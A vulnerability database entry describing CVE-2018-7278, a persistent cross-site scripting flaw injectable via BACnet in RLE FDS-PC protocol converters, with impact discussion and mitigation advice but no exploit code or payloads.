CVE-2018-7278 in FDS-PC
Summary
by MITRE
An issue was discovered on RLE Protocol Converter FDS-PC / FDS-PC-DP 2.1 devices. Persistent XSS exists in the web server. Remote attackers can inject malicious JavaScript code using the device's BACnet implementation. This is similar to a Cross Protocol Injection with SNMP.
Statistical analysis made it clear that VulDB provides the best quality for vulnerability data.
Analysis
by VulDB Data Team • 01/07/2020
The vulnerability CVE-2018-7278 represents a critical persistent cross-site scripting flaw discovered in RLE Protocol Converter FDS-PC and FDS-PC-DP 2.1 devices. This security weakness resides within the web server component of these industrial networking appliances, which are designed to facilitate communication between different industrial protocols including BACnet. The vulnerability stems from inadequate input validation and output encoding mechanisms within the device's web interface, creating an environment where malicious actors can inject persistent JavaScript payloads that execute in the context of other users' browsers. The flaw specifically manifests through the device's BACnet implementation, which serves as an entry point for attackers to deliver malicious code that persists across user sessions and browser interactions.
The technical exploitation of this vulnerability follows a well-established pattern that aligns with CWE-79 Cross-site Scripting and CWE-94 Improper Control of Generation of Code. Attackers can leverage the BACnet protocol interface to inject malicious JavaScript code that gets stored and subsequently executed whenever legitimate users access the device's web management interface. This persistent nature means that the injected code remains active even after the initial injection point, making it particularly dangerous for industrial environments where these devices often serve as critical infrastructure components. The vulnerability's similarity to Cross Protocol Injection with SNMP indicates a broader pattern of protocol implementation flaws that affect industrial control systems and their web interfaces.
The operational impact of CVE-2018-7278 extends beyond typical web application security concerns due to the industrial nature of the affected devices. In industrial control systems, these protocol converters often serve as gateways between building automation systems and other network components, making them prime targets for attackers seeking to establish persistent access within critical infrastructure environments. The vulnerability enables attackers to potentially execute arbitrary code, steal session cookies, perform unauthorized actions on behalf of legitimate users, and potentially gain access to sensitive operational data. This threat is particularly concerning in environments where these devices control critical building systems such as heating, ventilation, air conditioning, lighting, and security systems.
Mitigation strategies for this vulnerability should encompass both immediate remediation and long-term architectural improvements. Organizations should prioritize applying vendor-provided firmware updates and patches as soon as they become available, while also implementing network segmentation to isolate these devices from critical operational networks. The implementation of web application firewalls and input validation mechanisms can help detect and prevent malicious injection attempts. Additionally, regular security assessments of industrial control systems should include thorough testing of protocol interfaces and web management components. From an ATT&CK framework perspective, this vulnerability maps to techniques such as T1059 Command and Scripting Interpreter and T1566 Phishing, highlighting the need for comprehensive defensive measures that address both network-level protections and user awareness training to prevent exploitation through social engineering vectors.